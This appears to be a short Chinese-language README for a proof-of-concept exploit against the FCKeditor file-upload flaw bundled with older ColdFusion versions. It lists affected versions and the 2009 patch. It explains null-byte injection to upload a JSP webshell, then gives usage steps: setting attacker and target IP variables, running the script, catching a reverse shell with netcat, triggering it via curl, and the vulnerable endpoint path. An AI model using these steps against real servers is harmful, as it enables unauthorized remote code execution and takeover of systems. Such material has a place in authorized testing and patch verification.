通过 ColdFusion 捆绑的 FCKeditor 组件中的任意文件上传实现未经身份验证的远程代码执行。文件上传端点接受 filename 参数中的空字节注入,允许上传 JSP webshell 并由服务器直接执行。
| 版本 | 状态 |
|---|---|
| ColdFusion 8.0 | 受影响 |
| ColdFusion 8.0.1 | 受影响 |
| ColdFusion 9.0 | 受影响* |
| ColdFusion MX 6.x | 受影响 |
| ColdFusion MX 7.x | 受影响 |
| ColdFusion 9.0.1+ | 已修复 |
| ColdFusion 10+ | 不受影响 |
*如果未移除或更新 FCKeditor 组件,ColdFusion 9.0 会受影响。
补丁:Adobe 安全公告 APSB09-09(2009 年 7 月)。
编辑脚本顶部的变量:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
运行:
python3 poc.py
脚本将:
如果 shell 在几秒内未连接,请手动触发:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
上传后文件名会打印到 stdout。
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm